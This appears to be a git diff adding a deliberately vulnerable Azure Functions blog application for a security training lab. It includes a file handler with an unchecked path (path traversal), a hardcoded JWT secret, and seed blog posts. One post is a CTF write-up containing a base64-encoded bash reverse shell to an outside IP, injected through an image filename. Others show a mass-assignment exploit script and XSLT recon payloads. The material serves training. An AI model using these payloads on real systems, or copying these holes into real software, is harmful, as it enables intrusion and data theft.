'enable_cross_partition_query': True + } + user = list(user_container.query_items(**params)) + olduserdata = user + + user[0]['address'] = new_user_data['address'] + user[0]['name'] = new_user_data['name'] + user[0]['phone'] = new_user_data['phone'] + user[0]['username'] = new_user_data['username'] + user[0]['country'] = new_user_data['country'] + user[0]['secretQuestion'] = new_user_data['secretQuestion'] + user[0]['secretAnswer'] = new_user_data['secretAnswer'] + + update_response = user_container.replace_item(olduserdata[0], user[0]) + + responses = "User "+new_user_data['email']+" Updated" + return generateResponse(200, json.dumps({"body": responses})) + + elif method == "POST" and path == "get-dashboard": + currentYear = str(datetime.now().year) + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + + posts = list(post_container.query_items(**params)) + + params = { + 'query': 'SELECT * FROM c', + 'enable_cross_partition_query': True + } + users = list(user_container.query_items(**params)) + + total_posts=str(len(posts)) + total_users=str(len(users)) + + print("Total Posts: "+total_posts) + print("Total Users: "+total_users) + data={} + + for post in posts: + postingdate=post['postingDate'] + print(postingdate) + if postingdate[:7] in data: + data[postingdate[:7]]=data[postingdate[:7]] + 1 + else: + if (postingdate[:4]==currentYear): + 
data[postingdate[:7]]=1 + + for i in range(1,13): + mm=str(i).zfill(2) + key=currentYear+'-'+mm + if key not in data: + data[key]=0 + + chartLabels=list(data.keys()) + chartData=list(data.values()) + + for i in range(len(chartLabels)): + label=chartLabels[i] + yyyy=label[:4] + mm=label[5:7] + lab=mm+"/01/"+yyyy + chartLabels[i]=lab + + + recent_user_names=[] + recent_user_times=[] + for user in users: + createtime=datetime.strptime(user['creationDate'][:10], '%Y-%m-%d') + recent_user_names.append(user['name']) + recent_user_times.append(createtime) + + top_recent_users=[] + top_recent_times=[] + + for i in range(5): + list_index=recent_user_times.index(max(recent_user_times)) + top_recent_times.append(recent_user_times[list_index].strftime("%d %b %Y")) + top_recent_users.append(recent_user_names[list_index]) + del recent_user_names[list_index] + del recent_user_times[list_index] + + responses={ + "totalPosts": total_posts, + "totalUsers": total_users, + "chartLabel": chartLabels, + "chartData": chartData, + "recentUserNames": top_recent_users, + "recentUserDates": top_recent_times + } + return generateResponse(200, json.dumps({"body": responses})) + + else: + return generateResponse(200, json.dumps({"body": responses})) + + responses = "Invalid Authorization" + return generateResponse(200, json.dumps({"body": responses})) + + + diff --git a/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc b/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc new file mode 100644 index 0000000..83daf09 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/app/__pycache__/__init__.cpython-38.pyc differ diff --git a/modules/module-1/resources/azure_function/data/app/function.json b/modules/module-1/resources/azure_function/data/app/function.json new file mode 100644 index 0000000..31fecf7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/app/function.json @@ -0,0 +1,21 @@ +{ + "scriptFile": "__init__.py", + "bindings": [ + { + "authLevel": "anonymous", + "type": "httpTrigger", + "direction": "in", + "name": "req", + "methods": [ + "get", + "post" + ], + "route": "/{*path}" + }, + { + "type": "http", + "direction": "out", + "name": "$return" + } + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/host.json b/modules/module-1/resources/azure_function/data/host.json new file mode 100644 index 0000000..2bc092f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/host.json @@ -0,0 +1,20 @@ +{ + "version": "2.0", + "logging": { + "applicationInsights": { + "samplingSettings": { + "isEnabled": true, + "excludedTypes": "Request" + } + } + }, + "extensionBundle": { + "id": "Microsoft.Azure.Functions.ExtensionBundle", + "version": "[2.*, 3.0.0)" + }, + "extensions": { + "http": { + "routePrefix": "" + } + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/local.settings.json b/modules/module-1/resources/azure_function/data/local.settings.json new file mode 100644 index 0000000..8ee6895 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/local.settings.json @@ -0,0 +1,12 @@ +{ + "IsEncrypted": false, + "Values": { + "FUNCTIONS_WORKER_RUNTIME": "python", + "AzureWebJobsStorage": "UseDevelopmentStorage=true", + "JWT_SECRET" :"T2BYL6#]zc>Byuzu", + "AZ_DB_ENDPOINT" :"AZ_DB_ENDPOINT_REPLACE", + "AZ_DB_PRIMARYKEY" :"AZ_DB_PRIMARYKEY_REPLACE", + "CON_STR" :"CON_STR_REPLACE", + "CONTAINER_NAME" 
:"CONTAINER_NAME_REPLACE" + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/requirements.txt b/modules/module-1/resources/azure_function/data/requirements.txt new file mode 100644 index 0000000..aa3fe64 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/requirements.txt @@ -0,0 +1,9 @@ +# Do not include azure-functions-worker as it may conflict with the Azure Functions platform + +# Minimum packages for azure functions + +# Additional packages +azure-cosmos==4.3.0 +azure-storage-blob==12.12.0 +bcrypt==3.2.2 +pyjwt==1.7.1 diff --git a/modules/module-1/resources/azure_function/react/.funcignore b/modules/module-1/resources/azure_function/react/.funcignore new file mode 100644 index 0000000..a3a7965 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/.funcignore @@ -0,0 +1,13 @@ +*.js.map +*.ts +.git* +.vscode +.devcontainer/* +.editorconfig +.env.example +.eslintignore +.eslintrc.js +.gitignore +.prettierrc +local.settings.json +terraform/* \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/host.json b/modules/module-1/resources/azure_function/react/host.json new file mode 100644 index 0000000..2bc092f --- /dev/null +++ b/modules/module-1/resources/azure_function/react/host.json @@ -0,0 +1,20 @@ +{ + "version": "2.0", + "logging": { + "applicationInsights": { + "samplingSettings": { + "isEnabled": true, + "excludedTypes": "Request" + } + } + }, + "extensionBundle": { + "id": "Microsoft.Azure.Functions.ExtensionBundle", + "version": "[2.*, 3.0.0)" + }, + "extensions": { + "http": { + "routePrefix": "" + } + } +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/package.json b/modules/module-1/resources/azure_function/react/package.json new file mode 100644 index 0000000..f8799fb --- /dev/null +++ b/modules/module-1/resources/azure_function/react/package.json @@ -0,0 +1,9 @@ +{ + "name": "", + "version": "", + "description": "", + "scripts" : { + "test": "echo \"No tests yet...\"" + }, + "author": "" +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/function.json b/modules/module-1/resources/azure_function/react/webapp/function.json new file mode 100644 index 0000000..b1f9fda --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/function.json @@ -0,0 +1,20 @@ +{ + "bindings": [ + { + "authLevel": "anonymous", + "type": "httpTrigger", + "direction": "in", + "name": "req", + "methods": [ + "get", + "post" + ], + "route": "/{*page}" + }, + { + "type": "http", + "direction": "out", + "name": "res" + } + ] +} \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/index.html b/modules/module-1/resources/azure_function/react/webapp/index.html new file mode 100644 index 0000000..b0020e9 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/index.html @@ -0,0 +1 @@ +INE

\ No newline at end of file diff --git a/modules/module-1/resources/azure_function/react/webapp/index.js b/modules/module-1/resources/azure_function/react/webapp/index.js new file mode 100644 index 0000000..86cb777 --- /dev/null +++ b/modules/module-1/resources/azure_function/react/webapp/index.js @@ -0,0 +1,37 @@ +var fs = require('fs'); +const util = require('util'); +const readFileAsync = util.promisify(fs.readFile); + +module.exports = async function (context, req) { + if(context.req.query.file){ + let data; + try { + data = await readFileAsync(`./webapp/${context.req.query.file}`); + } catch (err) { + context.log.error('ERROR', err); + throw err; + } + context.res = { + body: data, + headers: { + "Content-Type": "application/javascript" + }}; + context.done(); + }else{ + let data; + try { + data = await readFileAsync('./webapp/index.html'); + } catch (err) { + context.log.error('ERROR', err); + // This rethrown exception will be handled by the Functions Runtime and will only fail the individual invocation + throw err; + } + context.res = { + body: data, + headers: { + "Content-Type": "text/html" + }}; + context.done(); + } + +} diff --git a/modules/module-1/resources/cosmosdb/blog-posts.json b/modules/module-1/resources/cosmosdb/blog-posts.json new file mode 100644 index 0000000..8a701b8 --- /dev/null +++ b/modules/module-1/resources/cosmosdb/blog-posts.json @@ -0,0 +1,92 @@ +[ + { + "id": "1", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525172652568597.png", + "postContent": "

Cloud security is a deeply nuanced topic. Although the fundamentals remain the same as in traditional cybersecurity, most practitioners are unfamiliar with the intricacies of cloud security.

To bridge this gap, our AWS cloud security syllabus covers IAM, API Gateway, Lambda, Cloud Databases and S3. By learning to secure these 5 most commonly used AWS components, professionals with a traditional cybersecurity background can be equipped with cloud-compatible skills.

We covered the technical details of these 5 components in a previous blog post, but what exactly do the labs entail? Let’s find out:

What are Pentester Academy’s AWS Cloud Security labs?

Our AWS labs are the first in the industry to provide a dedicated sandbox environment for AWS pentesting — essentially, they’re a “cloud playground” where you can learn and practice attacks without the hassle and risk of using your personal AWS account. Here’s what makes our cloud labs unique:


  • No AWS account required: our dedicated sandbox environment already contains real AWS accounts and lets you pentest cloud deployments directly in your browser. Getting started with cloud security has never been easier!
  • Industry-relevant syllabus: Given that most AWS deployments are breached by a common set of vulnerabilities which attackers repeatedly use, learning our syllabus — which covers such vulnerabilities — makes you job-ready immediately.
  • On-demand bootcamp recordings included: annual subscribers also get access to 19+ hours of bootcamp recordings to get you up to speed on both theory and practice!


How the labs are structured

Our 50+ AWS Cloud Security lab exercises are split into 6 categories — IAM, API Gateway, Lambda, Databases, DynamoDB and S3. Collectively, they cover the 5 components mentioned above (DynamoDB falls under Cloud Databases), and teach you how to identify and leverage misconfigurations hands-on.


Each category covers the corresponding component in depth, from basics/enumeration to advanced scenarios. Here are some attacks you can look forward to learning:

  1. Leverage misconfigured IAM policies to escalate privileges
  2. Understand AWS Lambda and exploit vulnerable applications to get a foothold
  3. Abuse overly permissive policies and misconfigured roles to escalate privileges
  4. Attack API Gateway endpoints via various means to bypass authentication
  5. Leverage S3 misconfigurations to steal data and chain attacks
  6. Gain persistence on a Lambda environment and steal any data processed by the Lambda function, even if the principle of least privilege is followed


", + "postingDate": "2022-05-25T00:00:00.000Z", + "postTitle": "Pentester Academy's AWS Cloud Security Labs", + "postStatus": "approved" + }, + { + "id": "2", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525172652548627.png", + "postContent": "

In our lab walkthrough series, we go through selected lab exercises on our AttackDefense Platform. Premium labs require a subscription, but you can sign in for free to try our community labs and view the list of topics — no subscription or VPN required!


The Metasploit Framework is a popular and powerful network penetration testing tool, used widely all around the world. The framework provides ready-to-use exploits and information-gathering modules to take advantage of a system’s weaknesses. It has powerful built-in scripts and plugins that let us automate the process of exploitation.

Lab Scenario

We have set up the below scenario in our Attack-Defense labs for our students to practice. The screenshots have been taken from our online lab environment.


Lab: https://attackdefense.pentesteracademy.com/challengedetails?cid=1492

This lab comprises a Kali machine with all tools installed on it. The user or practitioner gets shell command-line interface (CLI) access to the Kali machine through the web browser.

Challenge Statement

The target server as described below is running a vulnerable web application. Your task is to fingerprint the application using command-line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module.


Objective: Get a Meterpreter shell on the target!


", + "postingDate": "2022-04-04T00:00:00.000Z", + "postTitle": "Premium Lab: Navigate CMS Unauthenticated Remote Code Execution", + "postStatus": "approved" + }, + { + "id": "3", + "email": "johndoe@gmail.com", + "authorName": "John Doe", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173155599484.png", + "postContent": "

Mass Assignment occurs when an API takes user input directly and maps the values passed by the user to the backend object models.

What’s wrong with that?

If there are sensitive fields in the data models like isAdmin, isPremiumUser, isASubscriber, etc., a malicious party who controls these values can wreak havoc! They could make themselves an admin/premium user/subscriber and (mis)use the product or service — not an ideal situation.

Why does Mass Assignment happen?

Oh, that was the intern’s mistake…


Really? Nah… Let’s discuss the actual reasons!

Let’s face it — developers are lazy! Many rely on a lot of frameworks and boilerplate code. Any method that makes their tasks easier finds its way into their code.

Frameworks and programming languages let developers map user requests onto backend objects with just a one-liner! As developers, we love the convenience, but that’s what leads to this vulnerability in the first place!
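
As a rough illustration, here is what that convenient one-liner and the resulting privilege escalation can look like in Python (a hypothetical handler, not taken from any specific framework):

class User:
    def __init__(self, email):
        self.email = email
        self.isAdmin = False  # sensitive field the user should never control

def update_profile(user, request_json):
    # The convenient one-liner: blindly copy every request field onto the object
    user.__dict__.update(request_json)

u = User('mallory@example.com')
# A normal-looking profile update with one extra, attacker-chosen field:
update_profile(u, {'name': 'Mallory', 'isAdmin': True})
print(u.isAdmin)  # True: the attacker just made themselves an admin

# The boring-but-safe alternative is an explicit allow-list of fields:
def update_profile_safe(user, request_json, allowed=('name', 'phone')):
    for key in allowed:
        if key in request_json:
            setattr(user, key, request_json[key])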

This is the reality of development work — not something I made up, but something I experienced myself while I was a developer. It’s so pervasive and second nature to developers! If you are one, or have been there, I am sure you have that smile on your face :)

Mass Assignment is a cool bug that can get you a P1 if you are into pentesting or bug bounties! It’s not that common, and that’s why it holds the 6th position in the API Security Top 10 list.

Case Study: Mass Assignment Exploitation in the Wild

While keeping up on API Security, we came across this interesting post, which demonstrates a methodology for exploiting mass assignment that aligns with our own, so it’s worth sharing:

Mass Assignment exploitation in the wild - Escalating privileges in style

As I have been accepted to Synack's Red Team at the beginning of march, the opportunity emerged required me and other…

galnagli.com


Pentesting Methodology

The researcher had 2 accounts — one with higher privileges and one with lower privileges. He then made profile update requests to an endpoint and observed the parameters being passed in both accounts — unprivileged and privileged.


This gave him a hint that there was an extra parameter in the API requests which was sent in the privileged user’s profile update request.

So the next natural step was to try setting the same parameter in the unprivileged user’s profile update request, and voila! That resulted in giving the unprivileged user privileged access! Bingo — that was Mass Assignment in action.

In our experience, the response to the update request sometimes reveals such parameters as well, so responses should also be examined while hunting for this vulnerability.
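
To make the workflow concrete, here is a rough sketch of the replay step in Python; the endpoint, token and parameter names are made up for illustration:

import requests

# Parameter observed only in the privileged account's update request:
EXTRA_PARAM = {'role': 'admin'}

session = requests.Session()
session.headers['Authorization'] = 'Bearer LOW_PRIV_TOKEN'  # hypothetical low-privilege token

# Replay the unprivileged user's normal update, plus the extra parameter:
body = {'name': 'Bob', 'phone': '555-0100', **EXTRA_PARAM}
resp = session.post('https://target.example/api/profile/update', json=body)

# If a follow-up fetch of the profile now shows role=admin, the API
# mass-assigned a field the unprivileged user should never control.
print(resp.status_code, resp.text)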


", + "postingDate": "2022-03-08T00:00:00.000Z", + "postTitle": "Hunting for Mass Assignment", + "postStatus": "approved" + }, + { + "id": "4", + "email": "phasellus@aol.ca", + "authorName": "Connor Cantrell", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173359279634.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). Here, we outline our DevSecOps on-demand bootcamp and learning path, which begins with DevOps and teaches you how to integrate security into it.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Introduction: DevOps vs. DevSecOps

Any discussion of DevSecOps merits mention of DevOps as well. Before delving into the DevSecOps learning path, let’s first compare DevOps and DevSecOps:


DevOps: A framework for efficient software development

The different components of the DevOps framework

Wikipedia explains DevOps best: it is “a set of practices that combines software development (Dev) and IT operations (Ops). It aims to shorten the systems development life cycle and provide continuous delivery with high software quality.”

Today, DevOps has become a predominant approach in software and product development. It allows better visibility, coordination and faster iterations in comparison to other relatively older processes like SDLC or Agile, making it popular.

But there is a critical issue with DevOps: within this framework, software development teams do not take security into account. Combined with high-pressure commercial timelines and a lack of security awareness, this means developers end up releasing code containing vulnerabilities.

And thus, DevSecOps was born.

DevSecOps: Integrating Security with DevOps

DevSecOps = DevOps + Security

The name says it all: DevSecOps integrates security (Sec) into DevOps. DevSecOps is a set of practices that adds security components to each step of the DevOps process. It aims to shorten the systems development life cycle and provide continuous delivery with high software quality while taking care of the security aspect.

Instead of having a team for manual security testing, it is more efficient and cost/time-effective to have automated security checks to catch issues as soon as possible.

DevSecOps is thus a highly demanded and regarded skill in the industry. As a career-focused cybersecurity education company, we set out to equip professionals with DevSecOps knowledge through our on-demand bootcamp and learning path.

", + "postingDate": "2022-04-12T00:00:00.000Z", + "postTitle": "DevSecOps: Integrating Security with DevOps", + "postStatus": "rejected" + }, + { + "id": "5", + "email": "phasellus@aol.ca", + "authorName": "Connor Cantrell", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525173435646544.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). In this post, we outline our WebApp Security on-demand bootcamp and learning path, which will help you build a solid foundation in WebApp pentesting.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Why Learn Web Application Pentesting?

Most enterprises, regardless of size, run their own web applications. Vulnerabilities in these web applications make them prime targets for hackers — and hackers succeed at a very high cost both to enterprises and their customers.


Web application security is essential mainly because of the scale of impact. Millions of people interact with web applications every day to do everything from reading the news to shopping for groceries to planning their finances, and many of these applications store personal data such as addresses and credit card information. A single vulnerability is all a hacker needs to retrieve all of this. Thus, no pentester can be truly effective without a working understanding of web application security.

Start with our WebApp Security Bootcamp

Click here to see what’s covered.

This on-demand bootcamp lets you practice attacks on real-world web applications and teaches the subtle differences between pentesting traditional and cloud-based applications. Throughout 4 sessions, you will learn WebApp basics, OWASP Top 10 vulnerabilities and more, all via hands-on practice in our labs.

  • 12+ hours of live bootcamp recordings
  • 50+ Lab Exercises

After learning the concepts with the recordings, move on to our learning path which goes beyond the bootcamp’s syllabus to cover common tools used in WebApp pentesting and more!

WebApp Pentesting Learning Path

In the Web Application Pentesting learning path, you’ll learn to systematically dissect the inner mechanics of an application, chalk out the threatscape, identify possible attack vectors and then use various tools and techniques to launch the attack.

The learning path contains over 60 lab exercises, split into the below sections to build your skills progressively. The sections are standalone; however, we recommend beginners tackle them in this order:

  • Web Application Basics: Before any pentesting, it is important to learn what web applications are and how they work.
  • Tools of the Trade: Next, we’ll look at manual exploitation techniques using popular open-source attack tools, such as Burp Suite and Gobuster.
  • OWASP Top 10: OWASP Top 10 is an awareness document that outlines the most critical security risks to web applications. Here, you’ll learn how to pentest according to the OWASP TOP 10 standard.
  • Webapp CVEs (Common Vulnerabilities and Exposures): To round off your learning, you’ll see how to search for publicly available exploits and leverage them to compromise a target machine.

Overall, these labs and techniques are technology-stack agnostic and will use a combination of simulated and real-world applications. When you finish the entire learning path, you’ll have developed a solid foundation in Web Application Pentesting.

Prerequisites

To get the most out of this learning path, we recommend that you have:


  • A basic knowledge of computers and networking
  • Familiarity with the Linux operating system

Let’s dive in!

", + "postingDate": "2022-01-01T00:00:00.000Z", + "postTitle": "Web Application Pentesting: A Versatile Skill", + "postStatus": "approved" + }, + { + "id": "6", + "email": "interdum.curabitur@aol.com", + "authorName": "Raja Bauer", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525174934318996.png", + "postContent": "

To help you master specific topics, we offer both bootcamp recordings and learning paths (curated sets of labs). In this post, we outline our Container Security on-demand bootcamp and learning path — covering everything from basics to advanced.

For access, subscribe to an annual plan, which includes on-demand bootcamps, learning paths and more labs for other topics!

Containers: an overview

Over the last decade, largely because of the Docker open-source project, the interest in Linux container technology has exploded. Containers use operating system-level virtualization to isolate applications from one another. They are lightweight in comparison to virtual machines as they share the host machine’s kernel.


Docker has enabled developers to rapidly build and share applications, and Kubernetes has enabled these applications to be deployed and scaled dynamically. This has led to the widespread adoption of Docker in the industry.

However, like all complex software systems, the container ecosystem is prone to misconfiguration, leading to vulnerabilities that can be exploited by malicious users. Because of this, understanding container security and being able to audit a container environment are critical skills that all security professionals should possess.



This is a 4-session beginner bootcamp that will teach you the basics of containers and how to secure them. Learn how misconfigured components can lead to breakout attacks and eventually, host compromise.

This on-demand bootcamp covers different tools and techniques to audit containers, container hosts, image repositories and container management tools. Our unique lab setup lets you try low-level breakout attacks which otherwise can only be done in local virtual machines.

  • 9+ hours of live bootcamp recordings
  • 60+ Lab Exercises


What will you learn?

The Container Security learning path contains 11 categories of lab exercises that cover the basic concepts of container security and pentesting. You will learn how to use various tools and commands to identify and exploit vulnerabilities in the different components of the container ecosystem.


Prerequisites

To get the most out of this learning path, we recommend that you have:


  • A basic knowledge of computers and networking
  • Familiarity with the Linux operating system
  • Optionally, a basic knowledge of Docker

While each set of labs can be completed in any order, we recommend the following sequence:

Container Basics


This section explores the container management systems Docker and Podman. The labs also cover the low-level components of the Docker system, e.g. containerd and runc. Beginners will learn how to perform basic operations like pushing, pulling, creating and running containers. You will learn:

  • Using the Docker client to perform basic operations, including pushing, pulling and building images and interacting with containers and networks
  • Using podman to create, manage and interact with containers, images and networks
  • Interacting with containerd to run containers
  • Running Docker containers using Docker images with runc and umoci


", + "postingDate": "2022-01-12T00:00:00.000Z", + "postTitle": "Container Security: Securing the Docker Ecosystem", + "postStatus": "approved" + }, + { + "id": "7", + "email": "interdum.curabitur@aol.com", + "authorName": "Raja Bauer", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175114306915.png", + "postContent": "

The Linux Operating System forms the basis of a huge number of the applications that we use every day on the Internet. Linux servers are configured for uses as varied as high-performance computing, storage, network routing, and web servers. This flexibility means that the management of a Linux server is a complex subject with plenty of room for error. The large number of deployments and configurations has also led to new vulnerabilities being discovered almost every day. To protect a deployment on Linux, a system administrator must ensure that the Linux servers are always up to date with the latest security patches. A single vulnerable service or a minor mistake in configuration could leave the server, and the data residing on it, vulnerable to attack.


As a pentester, it is important to know how to scout for vulnerabilities and the ways they can be exploited. But first, one has to know how Linux works. In our labs, you’ll be using a Kali/Ubuntu Attacker machine to attack other Linux-based target machines.

Our learning path thus starts with Linux Basics, where you will learn concepts, commands and tools required to interact with various Linux services and applications. Specifically, the path covers:

  • Understanding the Linux filesystem and users
  • Understanding the system and user crontabs
  • Learning the important Linux commands and tools
  • Fingerprinting web applications and network services such as FTP and SSH
  • Creating bi-directional connections with socat

Once you’re comfortable with Linux, we’ll move on to explain Linux pentesting in the context of the 5 phases of hacking:

The 5 phases of hacking is a well-known methodology amongst security professionals, where attacks start with a reconnaissance phase and end with covering tracks. In our learning path, we expand on this methodology and show you how to perform additional phases such as Pivoting and Exploit Research.

Let’s dive right in!

Reconnaissance

Before attacking any application or service, it is important to gather as much information as possible. The more information an attacker has, the easier it will be to identify any misconfigurations and vulnerabilities. The objective of the reconnaissance section is to familiarize the student with the approach to follow for enumerating web applications and various network services, such as DNS, web servers, databases, caching systems, etc. Using the information, the attack vector and entry points can be identified and then used in the exploitation phase.


In our reconnaissance section, you’ll learn:

  • Identifying open ports on the machine
  • Identifying services running on the machine
  • Interacting with network services
  • Fingerprinting different types of services
  • Understanding service-specific misconfigurations
  • Enumerating files/directories on web applications
  • Scanning web applications using popular scanners and identifying entry points

Exploitation

The objective of the exploitation phase is to establish access to a system or resource by leveraging a vulnerability or bypassing a security restriction. In this section, the student will learn how to search for exploits based on the information acquired in the reconnaissance phase and use them to compromise the application or service. Once the attacker has compromised a machine, it is possible to attack other machines on the same network which may not be exposed to the Internet.


This section covers:

", + "postingDate": "2022-02-06T00:00:00.000Z", + "postTitle": "Linux Pentesting: From Recon to Exploit Research", + "postStatus": "pending" + }, + { + "id": "8", + "email": "orci.adipiscing@google.com", + "authorName": "Quinn Baird", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175420931108.png", + "postContent": "

I will be discussing how you can go about gaining root on a target machine in 3 different ways! Let's jump right into it.


A little background on the Challenge

For those who haven’t tried this CTF challenge yet, let me give a brief overview of the challenge. Then I’ll jump to the real meat of this post, and we’ll learn how to get a shell session on the target machine in different ways!


The challenge consists of an Online Image Converter webapp (not the prettiest creature, but it works ;)

Image Converter webapp provided in the challenge

It provides 3 features:

  • To generate an Image Art by supplying some text
  • To convert an image to another format (say from PNG to JPG)
  • To convert images to another format in BULK (expecting a zip archive to be uploaded).

Looks benign, right? I would say, don’t be quick to judge the book by its cover ;)

Okay, enough with background information. And now, the FUN part!

Exploitation a.k.a. The FUN stuff

In this post, I’ll be covering 3 different ways in which you could have got the MOST difficult flag. Out of those, 2 ways let you get a root shell on the target machine!


Excited? Let’s get going…

Approach 1:

Objective: In this approach, I will cover how to get the most difficult flag without getting a root shell.


Vulnerability: Command Injection in the image art generation

Outcome: We will get the shell session of a low-privileged user (robert)

Steps:

Step 1: Create a sample image using scrot utility (or any other way you prefer):

Commands:

scrot test.png

ls

Generate a sample image to be uploaded to the webapp

Step 2: Before uploading the image to the webapp, rename it so that once it gets processed by the backend code, the payload commands in the image name get executed and you get back a shell session!

Commands:

ip a

echo -n 'bash -i >& /dev/tcp/192.104.205.2/4444 0>&1' | base64

Check the IP address and encode a reverse shell payload

This is done because a file name cannot contain forward slashes (‘/’).
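
The challenge’s backend code isn’t shown, but the behaviour matches the classic vulnerable pattern sketched below in Python (the convert command and the filename handling are assumptions on my part):

import subprocess

def generate_image_art(uploaded_filename):
    # Vulnerable (assumed) pattern: the user-controlled filename is
    # interpolated into a shell command line, so shell metacharacters
    # in the name are executed by the shell.
    subprocess.run(f'convert {uploaded_filename} /tmp/out.png', shell=True)

# A filename of '; id #.png' turns the command line into
#   convert ; id #.png /tmp/out.png
# i.e. the shell runs convert (which fails), then runs id, with the
# rest of the line swallowed by the '#' comment.
generate_image_art('; id #.png')

Base64-encoding the reverse shell works around the filename restriction: the decoded payload (bash -i >& /dev/tcp/…) needs slashes, while the filename that carries it does not.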

Step 3: Copy the test.png file to a new file whose name is the payload.

New Image Name: '; bash -c "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTA0LjIwNS4yLzQ0NDQgMD4mMQ== | base64 -d)";.png'

Command: cp test.png '; bash -c "$(echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTA0LjIwNS4yLzQ0NDQgMD4mMQ== | base64 -d)";.png'

Copy the test image and create another image having payload in its name

Step 4: Start a netcat listener on the attacker machine before uploading the image.

Command: nc -lvp 4444

Start a netcat listener

Step 5: Upload the image to the webapp.

", + "postingDate": "2022-01-01T00:00:00.000Z", + "postTitle": "Highlights: API Security CTF [Nov 20-24]", + "postStatus": "approved" + }, + { + "id": "9", + "email": "tempor@icloud.net", + "authorName": "Prescott Hensley", + "getRequestImageData": "https://AZURE_FUNCTION_URL/images/20220525175644356721.png", + "postContent": "

If learning cybersecurity through offense is interesting to you, try our AttackDefense Lab Platform, containing 2000+ lab exercises covering various topics. Sign in for free to try our community labs and view the list of topics — no subscription or VPN required! And if you want to access our full depth of labs, check out our subscription.


Introduction

XML is a widely known format, and I am sure you must have heard a lot about XXE (XML External Entity); it’s even a part of the OWASP Top 10 list for Web Application Security.


But have you heard of XSLT?

It stands for Extensible Stylesheet Language Transformations and is a language used for transforming XML documents into either XML or other formats like HTML, SVG, plain text, etc.

As the Wikipedia page for XSLT puts it:

Although XSLT is designed as a special-purpose language for XML transformation, the language is Turing-complete, making it theoretically capable of arbitrary computations.


That must already sound like a lot of fun.

XSLT provides constructs like loops, if and switch-case, along with functions like substring, to manipulate XML documents. Not only that, it even allows you to define your own functions and call them. Amazing!

It uses XPath to locate different subsets of the XML document tree, which can then be operated on: checking their values, applying functions to their contents, and much, much more.

There’s a really awesome tutorial on XSLT and XPath; I highly recommend it if you wish to learn more about them. But for the scope of this post, what we’ve discussed will suffice.

XSLT Injections

Now let’s talk about the interesting bits.


Injection issues happen when user input is blindly trusted without thinking of the consequences. If the right conditions are met, this can result in data exfiltration, RCE, XSS and much, much more.

If a user is able to supply their own XSLT files or inject XSLT tags, this can result in XSLT injection. The constructs you have at your disposal greatly depend on the processor being used and the version of the XSLT specification. Version 1 is the most widely used and supported: the newer versions (2 & 3) are backwards compatible, and browsers support version 1; hence its popularity.

Versions 2 & 3 have a lot more features compared to version 1, so exploitation becomes much easier with the higher versions. But still, with version 1, you can get a lot done. Here are some interesting issues:

  • RCE
  • Local File Read (via error messages)
  • XXE
  • SSRF and Port Scans

In the XSLT ecosystem, we have a number of different processors, including:

Source: https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Abusing%20XSLT%20for%20practical%20attacks%20-%20Arnaboldi%20-%20IO%20Active.pdf

As you can see, libxslt is quite common, and the supported version is mostly 1; the exception is Saxon by Saxonica, which is quite feature-rich and supports both versions 1 and 2.

So for our discussion, we will focus on libxslt. It’s a C library developed for the GNOME project. You can try it out on the Linux CLI using the xsltproc command.

Now let’s focus on the attacks. This is not supposed to be an exhaustive guide on the subject (I’ve linked more resources at the end of this article for a deeper dive). We will just touch upon the basics and I will show you RCE & Local File Read using XSLT injection.

Consider an application that takes an arbitrary XSLT file and then parses its contents. What do you think could happen?

Recon

You might be thinking all this is good to know, but how do you even find out which processor is being used? Otherwise it would be sort of a “blind” attack, and that’s more painful and noisy, right? Worry not: there are some tags you can use to perform recon.


These are the 3 tags that would give you back the version, vendor and vendor url:

<xsl:value-of select=\"system-property('xsl:version')\" />\n<xsl:value-of select=\"system-property('xsl:vendor')\" />\n<xsl:value-of select=\"system-property('xsl:vendor-url')\" />\n

So you would now know which features are supported by the processor and can move forward to the exploitation part.
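
If you want to poke at these properties locally, Python’s lxml library (bindings around libxml2/libxslt) makes an easy harness. A minimal sketch, assuming lxml is installed:

from lxml import etree

RECON_XSL = b'''<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
                xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    version: <xsl:value-of select="system-property('xsl:version')"/>
    vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
    vendor-url: <xsl:value-of select="system-property('xsl:vendor-url')"/>
  </xsl:template>
</xsl:stylesheet>'''

transform = etree.XSLT(etree.XML(RECON_XSL))
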